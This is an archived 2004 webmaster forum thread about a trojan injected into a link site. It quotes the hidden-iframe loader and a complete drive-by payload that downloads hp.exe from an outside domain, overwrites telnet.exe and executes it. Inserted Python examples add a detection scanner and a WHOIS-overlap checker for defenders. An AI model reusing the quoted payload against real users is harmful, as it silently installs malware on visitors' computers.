GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Trojan on Tommys Bookmarks? (https://gfy.com/showthread.php?t=352210)

FreeOnes 09-05-2004 03:37 PM

Trojan on Tommys Bookmarks?
 
Am I the only one who gets a Trojan report when I go to
http://www.tommys-bookmarks.com/pmpegs.shtml

A pop-up is loading and I can't close it anymore. I have to completely shut down IE. This is what McAfee reports:
http://www.hostones.com/temp/tommysbookmarks.JPG

nastyking 09-05-2004 03:43 PM

...

Theo 09-05-2004 03:44 PM

Norton gives me a trojan too.
You'd better contact him since it seems his server got hacked.

RawAlex 09-05-2004 03:49 PM

Tommy is aware of this and is working like a madman to try to find the source. This one isn't very obvious. Where are you guys connecting from? It might be geo.

Alex

abshard 09-05-2004 03:52 PM

I get a popup that is blocked by SP2


From USA

FreeOnes 09-05-2004 03:54 PM

Me from the Netherlands
It seems like this trojan only shows up the first time you visit the page. Only after I remove all my cookies does it show up again!

Theo 09-05-2004 03:54 PM

Hi Alex, connecting from Greece

Vitasoy 09-05-2004 03:55 PM

Hmm, I didn't get any alerts. Canada.

FreeOnes 09-05-2004 03:59 PM

It's loading from: http://www.zerosexxx.com/fnp/md.htm



Registrant:
roxy
45 av bordeaux
paris, paris 75000
US

Registrar: DOTSTER
Domain Name: ZEROSEXXX.COM
Created on: 29-MAY-02
Expires on: 29-MAY-05
Last Updated on: 04-MAY-04

Administrative Contact:
dove, sebring [email protected]
roxy
45 av bordeaux
paris, paris 75000
US
0125259785
0124249874

Technical Contact:
dove, sebring [email protected]
roxy
45 av bordeaux
paris, paris 75000
US
0125259785
0124249874


Domain servers in listed order:
NS1.CANDIDHOSTING.COM
NS2.CANDIDHOSTING.COM

nastyking 09-05-2004 03:59 PM

<script language=javascript>
var bname=navigator.appName;
if (bname == 'Microsoft Internet Explorer') {
    document.write('<iframe src="http://www.zerosexxx.com/fnp/console.htm" width=1 height=1 style="position:absolute; visibility: hidden"></iframe>');
}
</script>

If you have a cookie set, it vanishes.

Theo 09-05-2004 04:05 PM

also same whois under:

Don't click them, they all have viruses:
www.Clamide-galleries.com
www.Clito57.com
www.Fatasshole.com
www.Fucks-pussy.com
www.Hardclito.com
www.Monsteract.com
www.Pornfree-gals.com
www.Ustimerz.com
www.Zerosexxx.com

FreeOnes 09-05-2004 04:07 PM

What does it do exactly?


var downloadurl="http://www.zerosexxx.com/fnp/hp.exe?3";

// pick the path of telnet.exe for Windows XP (NT 5.1) or Windows 2000 (NT 5.0)
if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1) savetopath="C:\\WINDOWS\\system32\\telnet.exe";
if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1) savetopath="C:\\WINNT\\system32\\telnet.exe";
payloadURL = downloadurl;

// fetch the executable with XMLHTTP
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET",payloadURL,0);
x.Send();
// "ADODB.Stream" is assembled one character at a time to dodge string matching
function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }
var s = new ActiveXObject(bla());
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(savetopath,2);    // overwrite telnet.exe with the downloaded file
location.href = "telnet://";   // the telnet: handler then launches the replaced telnet.exe


Secret dialer ?
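
The two snippets posted above show the whole chain: an IE-only hidden iframe pulls in a second page, which fetches hp.exe with XMLHTTP, writes it over telnet.exe through ADODB.Stream, and then navigates to a telnet: URL so Windows runs the replaced binary. A site owner cleaning up after this kind of injection wants a way to find the injected code in the web root, including the split-string trick that hides "ADODB.Stream" from a naive grep. The scanner below is an added example written for this page, not code from the thread or from Tommy's site; the indicator list and verdict thresholds are this example's own choices, and the sample pages are constructed (the first two reconstructed from the posted snippets with the forum word-filter damage undone).

```python
import os
import re
from typing import Dict, List

# Collapse JavaScript string concatenation such as "A" + "D" + "O" + "D" + "B"
# into the literal it builds, so the split-string trick the posted bla()
# function uses to hide "ADODB.Stream" does not defeat a plain text search.
_CONCAT = re.compile(r'''(["'])([^"']*)\1\s*\+\s*(["'])([^"']*)\3''')


def deobfuscate_concat(js: str) -> str:
    prev = None
    while prev != js:          # repeat until no adjacent literals remain
        prev = js
        js = _CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', js)
    return js


# Indicators taken from the two snippets posted in this thread (the IE-only
# hidden-iframe loader and the ADODB.Stream downloader). The names and the
# weighting are this example's own choices, not a published signature set.
INDICATORS = {
    "hidden_iframe": re.compile(
        r"<iframe[^>]*(?:width\s*=\s*[\"']?[01]\b|height\s*=\s*[\"']?[01]\b"
        r"|visibility\s*:\s*hidden)[^>]*>", re.I),
    "ie_only_gate": re.compile(r"appName.{0,40}Microsoft Internet Explorer", re.I | re.S),
    "xmlhttp": re.compile(r"(?:Microsoft|Msxml2)\.XMLHTTP", re.I),
    "exe_download_url": re.compile(r"https?://[^\s\"']+\.exe(?:\?[^\s\"']*)?", re.I),
    "adodb_stream": re.compile(r"ADODB\.Stream", re.I),
    "savetofile": re.compile(r"\.SaveToFile\s*\(", re.I),
    "telnet_overwrite": re.compile(r"system32\\+telnet\.exe", re.I),
    "telnet_uri_trigger": re.compile(r"[\"']telnet://", re.I),
}

# Any one of these is enough to call a page malicious: a gallery page has no
# business writing a downloaded response body to disk.
STRONG = {"adodb_stream", "savetofile", "telnet_overwrite"}


def scan_html(content: str) -> Dict[str, List[str]]:
    """Return {indicator: [matched snippets]} for one page's source text."""
    text = deobfuscate_concat(content)
    hits: Dict[str, List[str]] = {}
    for name, rx in INDICATORS.items():
        found = [m.group(0)[:80] for m in rx.finditer(text)]
        if found:
            hits[name] = found
    return hits


def verdict(hits: Dict[str, List[str]]) -> str:
    names = set(hits)
    if names & STRONG:
        return "malicious"
    if "hidden_iframe" in names or len(names) >= 2:
        return "suspicious"   # a loader, or several weak signs together
    return "clean"


def scan_tree(root: str, exts=(".htm", ".html", ".shtml", ".js")) -> Dict[str, str]:
    """Walk a document root and return {path: verdict} for every flagged file."""
    flagged: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                v = verdict(scan_html(fh.read()))
            if v != "clean":
                flagged[path] = v
    return flagged


# Constructed samples: the first two are reconstructed from the snippets
# posted in this thread (forum word-filter damage undone), the third is a
# harmless page with a 1x1 tracking image, which must not be flagged.
LOADER_SAMPLE = """<script language=javascript>
var bname=navigator.appName;
if (bname == 'Microsoft Internet Explorer') {
document.write('<iframe src="http://www.zerosexxx.com/fnp/console.htm" width=1 height=1 style="position:absolute; visibility: hidden"></iframe>');
}
</script>"""

PAYLOAD_SAMPLE = r"""var downloadurl="http://www.zerosexxx.com/fnp/hp.exe?3";
if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1) savetopath="C:\\WINDOWS\\system32\\telnet.exe";
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET",downloadurl,0); x.Send();
function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }
var s = new ActiveXObject(bla());
s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody);
s.SaveToFile(savetopath,2);
location.href = "telnet://";"""

CLEAN_SAMPLE = """<html><body><a href="gallery1.html">gallery 1</a>
<img src="counter.gif" width=1 height=1></body></html>"""

if __name__ == "__main__":
    for label, page in (("loader", LOADER_SAMPLE), ("payload", PAYLOAD_SAMPLE), ("clean", CLEAN_SAMPLE)):
        hits = scan_html(page)
        print(label, verdict(hits), sorted(hits))
```

Run it as is to see the three samples scored, or call scan_tree("/var/www/html") against a real document root. A hit on hidden_iframe alone only says the page is a loader; what actually reaches the visitor is whatever the second page (console.htm in this case) serves, so that second stage has to be fetched and scanned as well, from a machine that is not running IE.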

FreeOnes 09-05-2004 04:11 PM

Where did you get all these domains from? Have you already dealt with this guy?

I clicked the first link. Holy fuck. McAfee kept reporting and reporting :ak47:

nastyking 09-05-2004 04:12 PM

Quote:

Originally posted by FreeOnes
Where did you get all these domains from? Have you already dealt with this guy?

I clicked the first link. Holy fuck. McAfee kept reporting and reporting :ak47:

whois.sc

Theo 09-05-2004 04:13 PM

It's not a dialer.

The trojan downloads a backdoor file named telnet and it connects to an IRC server, from what I read on a security forum.

Za Ha 09-05-2004 04:22 PM

Everyone has a price.
I'm sure he is making good money off that.
I love the "Oh, I dunno where it's from" excuse.

RawAlex 09-05-2004 04:39 PM

Za Ha, you are a funny shit. Tommy is one VERY good egg in this business. Trust me, he is pulling his hair out over this one. His entire reputation is on the line. Nobody would be stupid enough to blow a business almost 10 years old on an obviously illegal hack.

That is the 4th TGP / link site that I have seen hacked in the last 2 weeks. The fucking assholes of the world are really pushing it.

Alex

RawAlex 09-05-2004 04:42 PM

Soul Rebel, that sort of behavior is similar to "eggdrop" that would be on a Unix box. It allows a person to remotely trigger a Denial of Service attack from many machines only by entering a key phrase into an IRC chatroom.

It can also trigger other things, such as the downloading to a specific email address of personal info from the machine, email address lists, or any other information located on the infected system. It would also allow for the installation of additional software without the end user's knowledge, such as a key logger or password trapper.

This is a VERY powerful hack, not script kiddie stuff. Even reading the Symantec website, you will see a certain amount of respect for the level of BS that went into making this sort of hack work.

It's pros, not amateurs, and it's dangerous.

Alex

nastyking 09-05-2004 04:47 PM

Quote:

Originally posted by RawAlex
Soul Rebel, that sort of behavior is similar to "eggdrop" that would be on a Unix box
eggdrop is just a normal IRC bot to keep your channel open (nothing to launch DDoS attacks).

Quote:

Even reading the Symantec website, you will see a certain amount of respect for the level of BS that went into making this sort of hack work.
URL plz

FreeOnes 09-05-2004 04:51 PM

Alex, who are you exactly?
I have sent Tommy an email, because I'm trading with him. please make sure that he is getting back to me about this issue. Thanks

Oh, and I'm pretty sure Za Ha is wrong. I can't believe that Tommy would ever do this. Only thing is that I have really no clue how this shit can load from his site. I have checked my own computer for any spyware shit and am very confident that there is nothing installed.

All this traffic stealing is getting out of hand. 2% of my own traffic is getting stolen. This is my main issue to solve the coming months.

Theo 09-05-2004 04:57 PM

No doubt Tommy didn't do that.

more about it here

http://216.239.59.104/search?q=cache...22s.SaveToFile(savetopath,2)%3B+%22&hl=en

Alex, I'm mailing you a possible valid US address of the domain owner.

Ramster 09-05-2004 05:03 PM

FreeOnes,
Tommy is aware of it. An email from a surfer is actually how he first found out, and like Alex said he is trying to figure out exactly how it is all happening.

Alex? He's been in the biz a long long time. Runs several link sites and of course knows Tommy and has for years. :)

RawAlex 09-05-2004 05:05 PM

Freeones, just another link site owner... nothing serious! Trust me, tommy has his hands full getting rid of this one.

Microsoft link on the subject:

http://www.microsoft.com/security/in...load_ject.mspx

You can have the "how to" of the exploit here. It really does require some interesting timing to trigger properly!

http://www.securiteam.com/securityre...HP0120D5W.html

Nastyking, eggdrop is key because it puts the infected computer in connection with an IRC server without permission, and listens for commands. This is the first step of a "multi homed" denial of service attack or other malicious behavior commanded remotely.

It's a hack, pure and simple.

Alex

Tempest 09-05-2004 05:32 PM

Quote:

Originally posted by FreeOnes
Registrant:
roxy
45 av bordeaux
paris, paris 75000
US

Ah yes. My good "friend" "roxy". This "guy" has been spamming cheating galleries for a few years now at least. And a lot of those other sites like Clito57. Again, redirecting/cheating galleries, "fake" TGPs with crappy/cheating traffic trading etc. "He" has even more than that. You just found his "bad" stuff, I believe (although I haven't 100% confirmed it yet) that he was a more "acceptable" buffer between some of that stuff and everyone else. A bunch of you probably even traffic trade and stuff with him... Gotta love this business..

Thanks for the info though, I need to add some of that into my DNS/Registrar checker for traffic trades and gallery submitters. :thumbsup
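
Theo's list of domains sharing the same WHOIS record, and Tempest's DNS/registrar checker for traffic trades, amount to the same check: parse the registrar output, then flag any trade partner whose record overlaps a known-bad one. Below is an added example of that check, not the thread's or Tempest's own tool. It parses the Dotster-style record layout quoted earlier in the thread, weights a shared contact e-mail or phone higher than a shared registrant name, and treats shared nameservers on their own as weak evidence, because they can simply mean the same hosting company. The KNOWN_BAD record reproduces the ZEROSEXXX.COM record from the thread with a placeholder e-mail (the real one was redacted); the three candidate domains, their contacts and their nameservers are hypothetical.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set

_EMAIL = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
_PHONE = re.compile(r"^\+?[\d\s().-]{8,}$")


@dataclass
class WhoisRecord:
    domain: str
    registrant: str
    emails: Set[str]
    phones: Set[str]
    nameservers: Set[str]


def parse_whois(text: str) -> WhoisRecord:
    """Parse the Dotster-style layout: sections open with 'Name:' and end at a blank line."""
    domain = registrant = ""
    emails: Set[str] = set()
    phones: Set[str] = set()
    ns: Set[str] = set()
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            section = None
            continue
        if line.lower().startswith("domain name:"):
            domain = line.split(":", 1)[1].strip().lower()
            continue
        if line.endswith(":"):
            head = line[:-1].lower()
            section = ("registrant" if head == "registrant"
                       else "ns" if head.startswith("domain servers")
                       else "contact" if "contact" in head else None)
            continue
        if section == "registrant" and not registrant:
            registrant = line.lower()            # first line of the block is the name
        elif section == "ns":
            ns.add(line.lower())
        emails.update(e.lower() for e in _EMAIL.findall(line))
        if section == "contact" and _PHONE.match(line):
            phones.add(re.sub(r"\D", "", line))  # keep digits only for comparison
    return WhoisRecord(domain, registrant, emails, phones, ns)


# Evidence weights (this example's choice): a shared contact e-mail or phone is
# near-certain common ownership, a shared registrant name is strong, shared
# nameservers alone can just mean the same hosting company.
WEIGHTS = {"emails": 3, "phones": 3, "registrant": 2, "nameservers": 1}


def overlap(a: WhoisRecord, b: WhoisRecord) -> Dict[str, Set[str]]:
    shared: Dict[str, Set[str]] = {}
    if a.registrant and a.registrant == b.registrant:
        shared["registrant"] = {a.registrant}
    for attr in ("emails", "phones", "nameservers"):
        common = getattr(a, attr) & getattr(b, attr)
        if common:
            shared[attr] = common
    return shared


def triage(known_bad: List[WhoisRecord], candidates: List[WhoisRecord]) -> Dict[str, str]:
    """Return {domain: 'block' | 'review' | 'ok'} for each candidate record."""
    verdicts: Dict[str, str] = {}
    for cand in candidates:
        score = sum(WEIGHTS[attr] for bad in known_bad for attr in overlap(bad, cand))
        verdicts[cand.domain] = "block" if score >= 3 else "review" if score else "ok"
    return verdicts


# Constructed sample records. KNOWN_BAD reproduces the ZEROSEXXX.COM record
# quoted in the thread with a placeholder e-mail; the candidates are hypothetical.
KNOWN_BAD = """Registrant:
roxy
45 av bordeaux
paris, paris 75000
US

Registrar: DOTSTER
Domain Name: ZEROSEXXX.COM

Administrative Contact:
dove, sebring roxy@example.com
0125259785
0124249874

Domain servers in listed order:
NS1.CANDIDHOSTING.COM
NS2.CANDIDHOSTING.COM
"""

CANDIDATES = [
    "Registrant:\nroxy\n\nDomain Name: TRADE-PARTNER-A.EXAMPLE\n\n"
    "Administrative Contact:\ndove, sebring roxy@example.com\n0125259785\n\n"
    "Domain servers in listed order:\nNS1.OTHERHOST.EXAMPLE\n",
    "Registrant:\nhonest webmaster\n\nDomain Name: LEGIT-TGP.EXAMPLE\n\n"
    "Administrative Contact:\nadmin@legit-tgp.example\n0155555555\n\n"
    "Domain servers in listed order:\nNS1.CANDIDHOSTING.COM\nNS2.CANDIDHOSTING.COM\n",
    "Registrant:\nsomeone else\n\nDomain Name: UNRELATED.EXAMPLE\n\n"
    "Administrative Contact:\nnoc@unrelated.example\n0166666666\n\n"
    "Domain servers in listed order:\nNS1.UNRELATED.EXAMPLE\n",
]

if __name__ == "__main__":
    bad = parse_whois(KNOWN_BAD)
    for domain, v in triage([bad], [parse_whois(c) for c in CANDIDATES]).items():
        print(f"{domain:28s} {v}")
```

Feed it real records by replacing the strings with the output of whois for each partner domain; record layouts differ between registrars, so the parser's section rules need extending for other formats. The point of the weighting is the situation cosis describes further down: a clean site that happens to sit on the same hosting company's nameservers scores "review", not "block".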

RawAlex 09-05-2004 05:34 PM

soul_rebel, didn't get the email, can you send it to rawalex hotmail please....?

Alex

Theo 09-05-2004 05:40 PM

Alex, that's where I sent it. Any other email? Although I just noticed the domain appeared for a period on an expired domain list, and probably the address points to the wrong person.

RawAlex 09-05-2004 05:49 PM

Okay, I got it. That info is useful mostly because it tipped me off to look at something else (see email) that might give a clue or two.

Interesting.

Alex

cosis 09-05-2004 05:53 PM

This is very odd. I see Candid Hosting in this thread; the same thing happened to my TGP, which is a good size. This is exactly why I switched from Candid Hosting last month, because my site was loading trojans all of a sudden, several times over a 2 week period. None of the support team could find anything that was causing someone to change my site. It hasn't happened since I moved from Candid Hosting to a new server over a month ago.

FreeOnes 09-06-2004 02:33 AM

Quote:

Originally posted by Tempest
Ah yes. My good "friend" "roxy". This "guy" has been spamming cheating galleries for a few years now at least. And a lot of those other sites like Clito57. Again, redirecting/cheating galleries, "fake" TGPs with crappy/cheating traffic trading etc. "He" has even more than that. You just found his "bad" stuff, I believe (although I haven't 100% confirmed it yet) that he was a more "acceptable" buffer between some of that stuff and everyone else. A bunch of you probably even traffic trade and stuff with him... Gotta love this business..

Thanks for the info though, I need to add some of that into my DNS/Registrar checker for traffic trades and gallery submitters. :thumbsup


I hate them all :321GFY

Preacher 09-06-2004 05:38 AM

It seems that the problem is fixed now. :thumbsup

johnbosh 09-06-2004 05:43 AM

Quote:

Originally posted by FreeOnes
Me from the Netherlands
It seems like this trojan only shows up the first time you visit the page. Only after I remove all my cookies does it show up again!

Here too.

RawAlex 09-06-2004 09:07 AM

Cleaning up after one of these things takes some time. Tommy is re-arranging the furniture and looking for them little bugs hiding in the corners. Let's just say he has NOT had a nice Labor Day weekend off.

Things should be 100% normal again in a day or so.

Alex

FreeOnes 09-13-2004 03:36 AM

Alex, why didn't I hear back from Tommy after 2 emails?
I really expect a reply. 2% of my traffic is stolen every day by this kind of fucking trojan shit. Everybody who is suspicious gets blacklisted from now on. I wouldn't expect Tommy would ever put this on his site, but I need a good explanation for it. If I don't get replies to my emails, you make yourself suspicious, no matter who you are.

TommysBookmarks 09-13-2004 03:49 PM

Hi Maurice,

You were told the site was hacked.
We don't trade traffic,
so after that it's really none of your business.

I think your emails and posts have been a little rude.

I answered your emails twice; I said I would let you know as soon as ServInt had some info for me.

If you want some information you should ask nicely, not like this.

We are hosted at the same company, and the same sales person handles our accounts. If you really wanted to know what happened you could just email ServInt and ask them.

Jeff aka NIGHTfall 09-13-2004 04:16 PM

owned

deleteduser 09-13-2004 04:22 PM

Tommy is a good guy :thumbsup I'm sure things will get fixed ASAP. Greetings to Steve!

Tom_PMs 09-13-2004 04:44 PM

Man, people who would even think Tommy or Cosis there would ever load shit like this on purpose need to get a grip... seriously...

It is interesting to note that 1 hosting company was/is hosting both sites when the problem popped up at first. I bet they'd like to know that to see if they have a backdoor open somewhere.

Goose 09-13-2004 04:45 PM

Well, I use Opera, so all popups are blocked anyway :thumbsup

fris 09-13-2004 04:51 PM

http://videodump.com/humor/piehole.jpg

